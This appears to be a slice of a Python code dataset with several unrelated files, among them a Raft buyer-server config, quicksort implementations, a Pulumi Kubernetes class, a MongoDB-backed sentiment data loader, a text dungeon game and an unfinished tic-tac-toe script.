host_and_port_wsdl = 'http://10.128.0.3:8002/?wsdl'\n success = 'Success'\n failure = 'Failure'\n\nclass UDP_constants:\n UDP_IP = \"0.0.0.0\"\n\n\nglobal_sequence_number = 0\nlocal_sequence_number = -1\ncurrent_host_number = 0\nUDP_PORT = 5005\nsequence_messsages = {}\nrequest_messages = {}\nraft_buyer = None\n\nclass ABP_servers:\n hosts = [('10.180.0.5', 5005), ('10.180.0.13', 5006), ('10.180.0.12', 5007)]\n raft_servers = [('10.180.0.5', 5010), ('10.180.0.13', 5010), ('10.180.0.12', 5010)]\n total_hosts = len(hosts)\n\nclass Request_Constants:\n context = 'origin_server'\n retransmit_context = 'origin_retransmit'\n\n\nsock = None\n\ndef init_sock():\n global sock\n sock = socket.socket(socket.AF_INET,\n socket.SOCK_DGRAM)\n sock.bind((UDP_constants.UDP_IP, UDP_PORT))\n sock.settimeout(2)\n\n\ndef init_current_server_number(num):\n global current_host_number\n current_host_number = num\n\n\ndef get_current_server_number():\n return current_host_number\n\n\ndef init_udp_port(port):\n global UDP_PORT\n UDP_PORT = port\n\n\ndef get_current_server_udp_port():\n return UDP_PORT\n\n\ndef get_sequence_number(sequence_type):\n if sequence_type == 'global':\n return global_sequence_number\n else:\n return local_sequence_number\n\n\ndef incr_sequence_number(sequence_type):\n if sequence_type == 'global':\n global global_sequence_number\n global_sequence_number += 1\n else:\n global local_sequence_number\n local_sequence_number += 1\n\ndef set_global_sequence_number(num):\n global global_sequence_number\n global_sequence_number = max(global_sequence_number, num)\n\n\ndef insert_into_sequence_messages(key, value):\n global sequence_messsages\n sequence_messsages[key] = value\n print(\"sequence messages :- \", sequence_messsages)\n print('--------------------------------------------------')\n\n\ndef insert_into_request_messages(key, value):\n global request_messages\n request_messages[key] = value\n print(\"request messages :- \", request_messages)\n print('--------------------------------------------------')\n\n\ndef get_messages_dict(message_type):\n if message_type == 'global':\n return sequence_messsages\n else:\n return request_messages\n\n\ndef clear_dict(message_type):\n if message_type == 'global':\n global sequence_messsages\n sequence_messsages = {}\n else:\n global request_messages\n request_messages = {}\n\n\nfrom pysyncobj import SyncObj, replicated_sync\nsql_alchemy_obj = None\n\ndef init_sql_alchemy_obj():\n global sql_alchemy_obj\n sql_alchemy_obj = create_engine(DBConstants.DB_products[get_current_server_number()])\n\n\nclass RaftBuyer(SyncObj):\n def __init__(self):\n super(RaftBuyer, self).__init__(\n ABP_servers.raft_servers[get_current_server_number()][0] + ':' + str(ABP_servers.raft_servers[get_current_server_number()][1]),\n [host[0] + ':' + str(host[1]) for host in ABP_servers.raft_servers if host !=\n ABP_servers.raft_servers[get_current_server_number()]])\n print(\"Raft buyer constructor :- \", ABP_servers.raft_servers[get_current_server_number()][0] + ':' + str(ABP_servers.raft_servers[get_current_server_number()][1]))\n print(sql_alchemy_obj)\n\n def update_func(self, item_id, diff):\n from models.items import Items\n # asyncio.run_coroutine_threadsafe(Items.update.values(quantity=diff).where(Items.id == item_id).gino.status(),\n # self.loop)\n with sql_alchemy_obj.connect() as con:\n con.execute('Update {} set quantity={} where id={}'.format(Items.__tablename__, diff, item_id))\n\n\n @replicated_sync\n def update_item(self, item_id, diff):\n print(\"Raft, updating item :- \", item_id)\n # asyncio.create_task(Items.update.values(quantity=diff).where(Items.id == item_id).gino.status())\n self.update_func(item_id, diff)\n # loop.create_task(Items.update.values(quantity=diff).where(Items.id == item_id).gino.status())\n # await Items.update.values(quantity=diff).where(Items.id == item_id).gino.status()\n\n\ndef init_raft_buyer():\n global raft_buyer\n raft_buyer = RaftBuyer()\n\n\n\ndef get_raft_buyer():\n return raft_buyer\n","sub_path":"Buyer_server/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"115208210","text":"def main():\n n = int(input('n: '))\n aux = int(n ** 0.5)\n quadrado = 0\n\n for i in range(0, aux, n):\n if i <= n:\n quadrado = aux ** 2\n print(f'o maior quadrado é: {quadrado}')\n\n\nmain()\n","sub_path":"Lista 03 Repetição for/for_03_14.py","file_name":"for_03_14.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"417621535","text":"import pulumi\nimport pulumi.runtime\n\nfrom ... import tables\n\nclass APIResourceList(pulumi.CustomResource):\n \"\"\"\n APIResourceList is a list of APIResource, it is used to expose the name of the resources\n supported in a specific group and version, and if the resource is namespaced.\n \"\"\"\n def __init__(self, __name__, __opts__=None, group_version=None, resources=None):\n if not __name__:\n raise TypeError('Missing resource name argument (for URN creation)')\n if not isinstance(__name__, str):\n raise TypeError('Expected resource name to be a string')\n if __opts__ and not isinstance(__opts__, pulumi.ResourceOptions):\n raise TypeError('Expected resource options to be a ResourceOptions instance')\n\n __props__ = dict()\n\n __props__['apiVersion'] = 'v1'\n __props__['kind'] = 'APIResourceList'\n if not groupVersion:\n raise TypeError('Missing required property groupVersion')\n __props__['groupVersion'] = group_version\n if not resources:\n raise TypeError('Missing required property resources')\n __props__['resources'] = resources\n\n super(APIResourceList, self).__init__(\n \"kubernetes:core/v1:APIResourceList\",\n __name__,\n __props__,\n __opts__)\n\n def translate_output_property(self, prop: str) -> str:\n return tables._CASING_FORWARD_TABLE.get(prop) or prop\n\n def translate_input_property(self, prop: str) -> str:\n return tables._CASING_BACKWARD_TABLE.get(prop) or prop\n","sub_path":"sdk/python/pulumi_kubernetes/meta/v1/APIResourceList.py","file_name":"APIResourceList.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"636824702","text":"\n\nfrom xai.brain.wordbase.nouns._arbiter import _ARBITER\n\n#calss header\nclass _ARBITERS(_ARBITER, ):\n\tdef __init__(self,): \n\t\t_ARBITER.__init__(self)\n\t\tself.name = \"ARBITERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"arbiter\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_arbiters.py","file_name":"_arbiters.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"365628190","text":"import random\n\ndef failed_quicksort(arr):\n if len(arr) <= 1:\n return arr\n\n # value at array position 0\n pivot_value = arr[0]\n\n smaller_array = []\n larger_array = []\n\n for i in arr[1:]:\n # test = range(1, len(arr))\n # print(test)\n if i <= pivot_value:\n smaller_array.append(i)\n else:\n # print(\"no larger?\")\n larger_array.append(i)\n\n # print(\"smaller\", smaller_array)\n # print(\"larger\", larger_array) \n\n sorted_smaller = quicksort(smaller_array)\n sorted_larger = quicksort(larger_array)\n\n # print(pivot_value)\n # print(\"sorted smaller\", sorted_smaller)\n # print(\"sorted larger\", sorted_larger)\n # sorted_smaller.append(pivot_value)\n\n return sorted_smaller + [pivot_value] + sorted_larger\n\ndef partition(data):\n left = []\n pivot = data[0]\n right = []\n\n for v in data[1:]:\n if v <= pivot:\n left.append(v)\n else:\n right.append(v)\n\n return left, pivot, right\n\ndef quicksort(data):\n if data == []:\n return data\n\n left, pivot, right = partition(data)\n\n return quicksort(left) + [pivot] + quicksort(right)\n\n\ntest_arr = random.sample(range(30), 20)\nprint(test_arr)\nprint(quicksort(test_arr))\nprint(failed_quicksort(test_arr))","sub_path":"src/quicksort/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"394927040","text":"import os,sys\nimport numpy as np\nimport torch\nimport utils\nfrom torchvision import datasets,transforms\nfrom sklearn.utils import shuffle\nimport pickle\nimport os\nimport pymongo\nimport collections\n\nimport numpy as np\nfrom collections import Counter\nimport random\n\n\ndef get(seed=0,pc_valid=0.10,args=0,max_doc_len=240, tasknum=10):\n data={}\n taskcla=[]\n size=[1,240,300]\n\n f = open('/home/zixuan/KAN/image/dat/sentiment/squence','r')\n domain_list = f.readlines()[0].replace('\\n','').split()\n\n if not os.path.isdir('/home/zixuan/KAN/image/dat/sentiment/binary_sentiment/'):\n os.makedirs('/home/zixuan/KAN/image/dat/sentiment/binary_sentiment')\n\n word2id, weights_matrix, voc_size= compute_embedding(domain_list)\n\n for n in range(10):\n data[n]={}\n data[n]['name']='sentiment'\n data[n]['ncla']=2\n\n train_x, _, train_y = load_inputs_document_mongo2D(\n [domain_list[n]], 'train', word2id, max_doc_len)\n val_x, _, val_y = load_inputs_document_mongo2D(\n [domain_list[n]], 'dev', word2id, max_doc_len)\n test_x, _, test_y = load_inputs_document_mongo2D(\n [domain_list[n]], 'test', word2id,max_doc_len)\n\n data[n]['train']={'x': train_x,'y': train_y}\n data[n]['valid']={'x': val_x,'y': val_y}\n data[n]['test']={'x': test_x,'y': test_y}\n\n # print(train_y.shape)\n # print(val_y.shape)\n # print(test_y.shape)\n # print(domain_list[n])\n # print(train_y)\n\n\n # \"Unify\" and save\n for t in data.keys():\n for s in ['train','valid','test']:\n\n data[t][s]['x']=torch.LongTensor(np.array(data[t][s]['x'],dtype=int))\n data[t][s]['y']=torch.argmax(torch.LongTensor(np.array(data[t][s]['y'],dtype=int)),dim=1).view(-1)\n\n torch.save(data[t][s]['x'], os.path.join(os.path.expanduser('/home/zixuan/KAN/image/dat/sentiment/binary_sentiment'),'data'+str(t)+s+'x.bin'))\n torch.save(data[t][s]['y'], os.path.join(os.path.expanduser('/home/zixuan/KAN/image/dat/sentiment/binary_sentiment'),'data'+str(t)+s+'y.bin'))\n\n # print(domain_list[t])\n # print(s)\n # print(data[t][s]['y'].size())\n\n\n np.save(os.path.join(os.path.expanduser('/home/zixuan/KAN/image/dat/sentiment/'),'weights_matrix'), weights_matrix)\n np.save(os.path.join(os.path.expanduser('/home/zixuan/KAN/image/dat/sentiment/'),'voc_size'),voc_size)\n\n\n # Load binary files\n data={}\n ids=list(shuffle(np.arange(10),random_state=seed))\n print('Task order =',ids)\n for i in range(10):\n data[i] = dict.fromkeys(['name','ncla','train','test','valid'])\n for s in ['train','valid','test']:\n data[i][s]={'x':[],'y':[]}\n data[i][s]['x']=torch.load(os.path.join(os.path.expanduser('/home/zixuan/KAN/image/dat/sentiment/binary_sentiment'),'data'+str(ids[i])+s+'x.bin'))\n data[i][s]['y']=torch.load(os.path.join(os.path.expanduser('/home/zixuan/KAN/image/dat/sentiment/binary_sentiment'),'data'+str(ids[i])+s+'y.bin'))\n data[i]['ncla']=len(np.unique(data[i]['train']['y'].numpy()))\n data[i]['name']='sentiment-'+str(domain_list[ids[i]])\n\n\n\n # Others\n n=0\n for t in data.keys():\n taskcla.append((t,data[t]['ncla']))\n n+=data[t]['ncla']\n data['ncla']=n\n\n\n weights_matrix = np.load(os.path.join(os.path.expanduser('/home/zixuan/KAN/image/dat/sentiment/'),'weights_matrix.npy'))\n voc_size= np.load(os.path.join(os.path.expanduser('/home/zixuan/KAN/image/dat/sentiment/'),'voc_size.npy'))\n\n\n\n return data,taskcla,size,voc_size,weights_matrix\n\n\n\n# facility ===========================\n\n\nclass Vocabulary(object):\n \"\"\"Vocabulary\n \"\"\"\n\n EOS = 'UNK'\n\n def __init__(self, add_eos=True):\n self._add_eos = add_eos\n self._word_dict = None\n self._word_list = None\n self._voc_size = None\n\n def load(self, iter_voc_item, word_column='word', index_column='index'):\n \"\"\"Load an existing vocabulary.\n\n Args:\n iter_voc_item: Iterable object. This can be a list, a generator or a database cursor.\n word_column (str): Column name that contains the word.\n index_column (str): Column name that contains the word index.\n\n \"\"\"\n # load word_dict\n word_dict = dict()\n for doc in iter_voc_item:\n word = doc[word_column]\n index = doc[index_column]\n word_dict[word] = index\n\n # generate word_list\n voc_size = len(word_dict)\n word_list = [None for _ in range(voc_size)]\n for word, index in word_dict.items():\n word_list[index] = word\n\n self._word_dict = word_dict\n self._word_list = word_list\n self._voc_size = voc_size\n return self\n\n def dump(self, word_column='word', index_column='index'):\n \"\"\"Dump the current vocabulary to a dict generator.\n\n Args:\n word_column (str): Column name for word.\n index_column (str): Column name for index.\n\n Returns:\n A generator of dict object.\n\n \"\"\"\n for word, index in self._word_dict.items():\n yield {\n word_column: word,\n index_column: index\n }\n\n def generate(self, iter_words, words_column='words', min_count=1, verbose_fn=None):\n \"\"\"Generate a vocabulary from sentences.\n\n Args:\n iter_words: Iterable object. This can be a list, a generator or a database cursor.\n words_column (str): Column name that contains \"words\" data.\n min_count (int): Minimum count of the word in the vocabulary.\n verbose_fn ((int) -> None): Verbose function.\n This is useful when iter_words contains much more documents.\n\n \"\"\"\n # statistic info\n counter = collections.defaultdict(int)\n for i, doc in enumerate(iter_words, 1):\n words = doc[words_column]\n for word in words:\n counter[word] += 1\n if verbose_fn:\n verbose_fn(i)\n if '' in counter:\n del counter['']\n\n # generate word_dict (word -> index)\n word_dict = {self.EOS: 0}\n for word, count in counter.items():\n if count < min_count:\n continue\n index = len(word_dict)\n word_dict[word] = index\n\n # generate word_list\n voc_size = len(word_dict)\n word_list = [None for _ in range(voc_size)]\n for word, index in word_dict.items():\n word_list[index] = word\n\n self._word_dict = word_dict\n self._word_list = word_list\n self._voc_size = voc_size\n return self\n\n @property\n def voc_size(self):\n return self._voc_size\n\n @property\n def word_dict(self):\n return self._word_dict\n\n @property\n def word_list(self):\n return self._word_list\n\n def indexes_to_words(self, indexes):\n id2word = {}\n for index in range(indexes):\n id2word[index] = self._word_list[index]\n return id2word\n\n\nclass WordEmbedding(object):\n\n def __init__(self):\n self._word_dict = None\n self._word_list = None\n self._emb_mat = None\n\n def load(self, iter_emb_item, word_column='word', index_column='index', vector_column='vector'):\n # load word_dict and emb_dict\n word_dict = dict()\n emb_dict = dict()\n for doc in iter_emb_item:\n word = doc[word_column]\n index = doc[index_column]\n vector = doc[vector_column]\n word_dict[word] = index\n emb_dict[index] = vector\n voc_size = len(word_dict)\n\n # generate word_list\n word_list = [None for _ in range(voc_size)]\n for word, index in word_dict.items():\n word_list[index] = word\n\n # generate emb_list\n emb_list = [None for _ in range(voc_size)]\n for index, vector in emb_dict.items():\n emb_list[index] = vector\n\n self._word_dict = word_dict\n self._word_list = word_list\n self._emb_mat = np.array(emb_list, np.float32)\n return self\n\n def dump(self, word_column='word', index_column='index', vector_column='vector'):\n \"\"\"Dump the current vocabulary to a dict generator.\n\n Args:\n word_column (str): Column name for word.\n index_column (str): Column name for index.\n vector_column (str): Column name for vector.\n\n Returns:\n A generator of dict object.\n\n \"\"\"\n for word, index in self._word_dict.items():\n vector = self._emb_mat[index]\n yield {\n word_column: word,\n index_column: index,\n vector_column: pickle.dumps(vector)\n }\n\n def generate(self,\n voc,\n iter_pre_trained,\n word_column='word',\n vector_column='vector',\n bound=(-1.0, 1.0),\n verbose_fn=None):\n \"\"\"Generate word embedding.\n\n Args:\n voc (Vocabulary): Vocabulary.\n iter_pre_trained: Iterator/Generator of per-trained word2vec.\n word_column (str): Column name for word.\n vector_column (str): Column name for vector.\n bound (tuple[float]): Bound of the uniform distribution which is used to generate vectors for words that\n not exist in pre-trained word2vec.\n verbose_fn ((int) -> None): Verbose function to indicate progress.\n\n \"\"\"\n # inherit input vocabulary's word_dict and word_list\n self._word_dict = voc.word_dict\n self._word_list = voc.word_list\n\n # generate emb_list\n emb_size = None\n emb_list = [None for _ in range(voc.voc_size)] # type: list\n for i, doc in enumerate(iter_pre_trained, 1):\n if verbose_fn:\n verbose_fn(i)\n word = doc[word_column]\n vector = doc[vector_column]\n if emb_size is None:\n emb_size = len(vector)\n try:\n index = self._word_dict[word]\n except KeyError:\n continue\n emb_list[index] = vector\n\n # If a word is not in the pre-trained embeddings, generate a random vector for it\n for i, vector in enumerate(emb_list):\n vector = emb_list[i]\n if vector is None:\n vector = np.random.uniform(bound[0], bound[1], emb_size)\n emb_list[i] = vector\n\n self._emb_mat = np.array(emb_list, np.float32)\n return self\n\n @property\n def word_dict(self):\n return self._word_dict\n\n @property\n def word_list(self):\n return self._word_list\n\n @property\n def emb_mat(self):\n return self._emb_mat\n\n\nclass Label(object):\n def __init__(self):\n self.not_use = ()\n\n @staticmethod\n def convert_rating_to_POSNEG(ratting):\n if ratting > 3.0:\n return 'POS'\n elif ratting < 3.0:\n return 'NEG'\n else:\n return 'NEU'\n\n @staticmethod\n def get_label_to_index_dict():\n return {\"POS\": 1, \"NEG\": 0}\n\n @staticmethod\n def get_index_to_label_dict():\n return {1: \"POS\", 0: \"NEG\"}\n\n @staticmethod\n def convert_POSNEG_to_plus1minus1(label):\n if label == \"POS\" or label == 1:\n return 1\n elif label == \"NEG\" or label == 0:\n return 0\n\n @staticmethod\n def convert_plus1minus1_to_POSNEG(label):\n if label == \"POS\" or label == 1:\n return \"POS\"\n elif label == \"NEG\" or label == 0:\n return \"NEG\"\n\n\ndef load_w2v_mongo(domain_list):\n print('domai_list',domain_list)\n with pymongo.MongoClient() as conn:\n conn['admin'].authenticate('root', 'SELECT * FROM password;')\n db = conn['zixuan_d']\n coll_vocab = db['pn_vocab']\n\n print('domain_list',domain_list)\n print('Loading vocabulary...')\n voc = Vocabulary()\n voc.load(\n iter_voc_item=(doc for doc in coll_vocab.find({\"domain\":{\"$in\":domain_list}})),\n word_column='word',\n index_column='value'\n )\n word2id = voc.word_dict\n print(f'Vocabulary loaded. voc_size={voc.voc_size}')\n\n print('Generating embeddings...')\n\n def verbose(i):\n if i % 10000 == 0:\n print(f'Processing {i}', end='\\r')\n\n emb = WordEmbedding()\n emb.generate(\n voc=voc,\n iter_pre_trained=(\n {'word': doc['word'], 'vec': doc['vec']}\n for doc in conn['word2vec']['glove_840B_300d'].find()\n ),\n word_column='word',\n vector_column='vec',\n verbose_fn=verbose\n )\n w2v = emb.emb_mat\n\n return word2id, w2v, voc.voc_size\n\n\n\n\n\ndef load_y2id_id2y(file):\n y2id = dict()\n id2y = dict()\n with open(file, 'r', encoding='utf-8') as fout:\n for line in fout:\n y, id_y = line.split()\n y2id[y] = int(id_y)\n id2y[int(id_y)] = y\n return y2id, id2y\n\n\n\ndef load_inputs_document_mongo2D(domains, type_data, word_id_file, max_doc_len, encoding='utf-8'):\n if type(word_id_file) is str:\n word_to_id = load_word2id(word_id_file)\n else:\n word_to_id = word_id_file\n\n print(\"domains\",domains)\n\n x, y, sen_len, doc_len = [], [], [], []\n with pymongo.MongoClient() as mongo_client:\n mongo_client['admin'].authenticate('root', 'SELECT * FROM password;')\n db = mongo_client['zixuan_d']\n domain_list = domains\n\n coll_name = db['pn_' + type_data]\n for domain in domain_list:\n coll_reviews = coll_name.find({\"domain\": domain})\n for review in coll_reviews:\n label = review['label']\n if label == 0 or label == '0':\n continue\n t_x = np.zeros((max_doc_len,)) # initialization with zero for padding\n doc = review['lemma']\n doc_flag = False\n doc = ' '.join(doc)\n\n j = 0 # word j\n words = doc.split()\n for word in words:\n if j < max_doc_len:\n if word in word_to_id:\n t_x[j] = word_to_id[word]\n j += 1\n else:\n t_x[j] = word_to_id['UNK'] # word_to_id['UNK'] = 0\n j += 1\n else:\n break\n if j > 2: # if more than two words, treading as a sentence\n doc_flag = True\n\n\n # end for sentences\n if doc_flag:\n doc_len.append(j) # 'the number of sentences' of each doc in a batch\n x.append(t_x)\n # convert_plus1minus1_to_one_zero\n if label == -1 or label == '-1':\n label = int(0)\n y.append(label)\n print('load ' + type_data + ' dataset {} done!'.format(domain))\n y = change_y_to_onehot(y)\n\n return np.asarray(x), np.asarray(doc_len), np.asarray(y)\n\n\ndef domains():\n domain_list = []\n with pymongo.MongoClient() as conn:\n conn['admin'].authenticate('root', 'SELECT * FROM password;')\n db = conn['zixuan_d']\n coll_domain = db['domain2index']\n for item in coll_domain.find():\n domain_list.append(item['domain'])\n domain_list.sort()\n return domain_list\n\ndef compute_embedding(domain):\n word2id, w2v, voc_size = load_w2v_mongo(domain)\n return word2id, w2v, voc_size\n\n\n\ndef load_word2id(domain):\n with pymongo.MongoClient() as conn:\n conn['admin'].authenticate('root', 'SELECT * FROM password;')\n db = conn['zixuan_d']\n coll_vocab = db['pn_vocab']\n\n print('Loading {} vocabulary...'.format(domain))\n voc = Vocabulary()\n voc.load(\n iter_voc_item=(doc for doc in coll_vocab.find({\"domain\": domain})),\n word_column='word',\n index_column='value'\n )\n print(f'Vocabulary loaded. voc_size={voc.voc_size}')\n voc.dump()\n word2id = voc.word_dict\n return word2id\n\n\n\ndef change_y_to_onehot(y):\n print(Counter(y))\n class_set = set(y)\n n_class = len(class_set) # the number of classes\n y_onehot_mapping = dict(zip(class_set, range(n_class)))\n print(y_onehot_mapping)\n with open('dat/sentiment/y2id.txt', 'w', encoding='utf-8') as fin:\n for k, v in y_onehot_mapping.items():\n fin.write(str(k) + ' ' + str(v) + '\\n')\n onehot = []\n for label in y:\n tmp = [0] * n_class\n tmp[y_onehot_mapping[label]] = 1 # only tmp[y_onehot_mapping[label]] = 1, others = 0\n onehot.append(tmp)\n return np.asarray(onehot, dtype=np.int32)","sub_path":"reference/UCL/dataloaders/sentiment.py","file_name":"sentiment.py","file_ext":"py","file_size_in_byte":17101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"634097918","text":"from corehq.apps.cleanup.management.commands.populate_sql_model_from_couch_model import PopulateSQLCommand\n\n\nclass Command(PopulateSQLCommand):\n @classmethod\n def couch_doc_type(self):\n return 'DefaultConsumption'\n\n @classmethod\n def sql_class(self):\n from corehq.apps.consumption.models import DefaultConsumption\n return DefaultConsumption\n\n @classmethod\n def commit_adding_migration(cls):\n return \"d38d08f8616b908f7d5f803f54bc5f775e49ca95\"\n\n def update_or_create_sql_object(self, doc):\n model, created = self.sql_class().objects.update_or_create(\n couch_id=doc['_id'],\n defaults={\n \"type\": doc.get(\"type\"),\n \"domain\": doc.get(\"domain\"),\n \"product_id\": doc.get(\"product_id\"),\n \"supply_point_type\": doc.get(\"supply_point_type\"),\n \"supply_point_id\": doc.get(\"supply_point_id\"),\n \"default_consumption\": round(float(doc[\"default_consumption\"]), 8)\n if doc.get(\"default_consumption\", None) else None,\n })\n return (model, created)\n","sub_path":"corehq/apps/consumption/management/commands/populate_defaultconsumption.py","file_name":"populate_defaultconsumption.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"478463630","text":"import logging\nimport random\nimport os\n\n#draw player in the grid\n#make input for movement\n# move the player unless invalid move (past edges)\n#check for win/loss\n# clear the screen\n#draw grid\nlogging.basicConfig(filename='dungeon_logs/game.log', level=logging.DEBUG)\n\nCELLS = [(0,0), (1, 0), (2, 0), (3, 0), (4, 0),\n (0, 1), (1, 1), (2, 1), (3, 1), (4, 1),\n (0, 2), (1, 2), (2, 2), (3, 2), (4, 2),\n (0, 3), (1, 3), (2, 3), (3, 3), (4, 3)]\nwins =0\nloses =0\n\ndef clear_screen():\n # clear the screen\n os.system('cls' if os.name == 'nt' else 'clear')\n\n\ndef get_location():\n # random loc for player\n # random loc for door\n # random loc for monster\n return random.sample(CELLS, 3)\n\ndef draw_map(player_user, player, monster):\n print(\"\")\n print(' _'*5) #strecha\n tile = '|{}' #policko s placeholderom\n\n for cell in CELLS: # pre kazdy element v CELLS, dostane cell hodnotu x,y\n x, y = cell # do noveho x rozbalime tuples z CELLU\n if x < 4: #ak policka su do hodnoty 4, tj nie su kraji\n line_end = \"\" # toto je pre funkciu print na konci aby nevytvarala novy riadok, ale pokracovala\n\n if cell == player:\n output = tile.format('X')\n elif cell in player_user['locations']:\n output = tile.format('.')\n elif cell == monster:\n output = tile.format('O')\n else:\n output = tile.format('_')\n else: # tj ked je x == 4\n line_end = \"\\n\"\n if cell == player:\n output = tile.format('X|')\n elif cell == monster:\n output = tile.format('O|')\n else:\n output = tile.format('_|')\n print(output,end=line_end)\ndef game_loop():\n monster, player, door = get_location() #rozbali sa výsledok funkcie do tuples\n player_user = {}\n player_user['locations'] = [player]\n logging.info('monster: {}; door: {}; player: {};'.format(monster, door, player_user['locations']))\n\n playing = True\n\n while playing:\n global loses\n global wins\n clear_screen()\n draw_map(player_user, player, monster)\n valid_moves = get_moves(player)\n\n print('You are currently in room {}'.format(player)) # fill with player position\n print('Monster is currently in room {}'.format(monster)) # fill with monster position\n print('You can move {}.'.format(', '.join(valid_moves))) # available moves\n print('Type \"QUIT\" to quit.')\n print('Type \"stats\" to quit.')\n\n move = input(\"> \")\n move = move.upper()\n\n if move == 'QUIT':\n print(' ** See you next time!!!! **')\n break\n if move == 'STATS':\n print(f'Wins:{wins}\\nLoses:{loses}')\n continue\n if move in valid_moves:\n player = move_player(player, move)\n update_player(player_user, player)\n monster = move_monster(monster)\n if player == monster:\n print(\" ** WoW there! You ready to face the monster fella? ** \")\n loses += 1\n playing = False\n elif player == door:\n print(' ** You won! **')\n wins += 1\n playing = False\n\n else:\n input(' \\n ** Do not run into the wall! **\\n ')\n clear_screen()\n # Good move? Change the player position\n # BAD move - do not change anything\n # On monster - they lose\n # On door - they win\n # Otherwise, loop back around\n else:\n if input('Play again? [Y]/[N]').lower() != 'n':\n game_loop()\n\n\n\n\ndef get_moves(player):\n moves = ['LEFT', 'RIGHT', 'UP', 'DOWN']\n x,y = player\n if x == 0: #if player's 'x' == 0, they can't go left\n moves.remove('LEFT')\n if x == 4:\n moves.remove('RIGHT') #if player's 'x' == 4, they can't go right\n if y == 0:\n moves.remove('UP') #if player's 'y' == 0, they can't go up\n if y == 4:\n moves.remove('DOWN') #if player's 'y' == 4, they can't go down\n return moves\n\ndef move_player(player, move):\n x, y = player\n if move == 'LEFT': #if move == 'LEFT' x - 1\n x -= 1\n if move == 'RIGHT': #if move == 'RIGHT' x + 1\n x += 1\n if move == 'DOWN': #if move == 'DOWN' y + 1\n y += 1\n if move == 'UP': #if move == 'UP' y - 1\n y -= 1\n return x,y\n\ndef update_player(player_user, player):\n player_user['locations'].append(player)\n print(player_user['locations'])\n\ndef move_monster(monster):\n moves = ['LEFT', 'RIGHT', 'UP', 'DOWN']\n x, y = monster\n if x == 0: #if monster's 'x' == 0, they can't go left\n moves.remove('LEFT')\n if x == 4:\n moves.remove('RIGHT') #if monster's 'x' == 4, they can't go right\n if y == 0:\n moves.remove('UP') #if monster's 'y' == 0, they can't go up\n if y == 4:\n moves.remove('DOWN')\n\n new_move = random.choice(moves) # pouzit nahodny sampel z moznych ciest, ktore ostali\n if new_move == 'LEFT': #if move == 'LEFT' x - 1\n x -= 1\n if new_move == 'RIGHT': #if move == 'RIGHT' x + 1\n x += 1\n if new_move == 'DOWN': #if move == 'DOWN' y + 1\n y += 1\n if new_move == 'UP': #if move == 'UP' y - 1\n y -= 1\n return x,y\n\n\n\n\nclear_screen()\nprint('Welcome to the Dungeon.')\ninput('Press enter to start!')\nclear_screen()\ngame_loop()\n","sub_path":"VariousGames/dungeons_game.py","file_name":"dungeons_game.py","file_ext":"py","file_size_in_byte":5528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"141191212","text":"def create_board():\r\n#write intro\r\n#catch moves\r\n#test if square is available\r\n#test if squares are left\r\n#three of a kind\r\n#Ask user if they want to play again\r\n#write conclusion \r\n\r\n\tprint(sq[9]+'|'+sq[8]+'|'+sq[7])\r\n\tprint('-----')\r\n\tprint(sq[4]+'|'+sq[5]+'|'+sq[6])\r\n\tprint('-----')\r\n\tprint(sq[1]+'|'+sq[2]+'|'+sq[3])\r\n\tprint('\\n\\n')\r\n\r\nsq=['*']*10\r\nsq[5]='X'\r\nsq[3]='O'\r\n\r\n\r\ndef print_intro():\r\n\t#Ask the player which letter they want to be.\r\n\tglobal X\r\n\tletter='*'\r\n\twhile not (letter == 'X' or letter == 'O'):\r\n\t\tprint('Welcome. Do you want to be X or O?')\r\n\t\tletter=input().upper()\r\n\t#First element in the tuple is the user's letter,second is the computer\r\n\tif letter == 'X':\r\n\t\treturn ['X','O']\r\n\telse:\r\n\t\treturn ['O','X']\r\n\r\n\r\n\r\n\r\nprint('Type numbers 1-9 to occupy square')\r\nprint('\\n\\n')\r\nprint(':')\r\n\t\r\ndef record_moves():\r\n\tmove=10\r\n\twhile move not in range(1,10) or is_sq_occupied(move): \r\n\t\tmove=(input('Enter valid move:'))\r\n\t\tsq[move]= 'X'\r\n\t\t\r\n\r\n\r\ndef is_sq_occupied(num):\r\n\t#if sq[num] ==' ':\r\n\t#\treturn True\r\n\t#else:\r\n\t\treturn sq[num]!=''\r\n\t\r\ndef sq_is_full():\r\n\tfor index in sq:\r\n\t\tif index in range(1,10):\r\n\t\t\tif sq[index]==' ':\r\n\t\t\t\treturn False\r\n\t\treturn True\r\n\r\ndef three_in_a_row():\r\n\treturn ((sq[7] ==sq[8] and sq[9]and sq[7]!=' ') or\r\n\t(sq[4] ==sq[5] and sq[6]!= ' ') or\r\n\t(sq[3] ==sq[2] and sq[1]!= ' ') or\r\n\t(sq[7] ==sq[4] and sq[1]!= ' ') or\r\n\t(sq[8] ==sq[5] and sq[2]!= ' ') or\r\n\t(sq[9] ==sq[6] and sq[3]!= ' ') or\r\n\t(sq[7] ==sq[5] and sq[3]!= ' ') or\r\n\t(sq[9] ==sq[5] and sq[1]!= ' '))\r\n\t\r\n\r\ndef play_again():\r\n\t print('Do you want to play again? (yes or no)')\r\n\t return 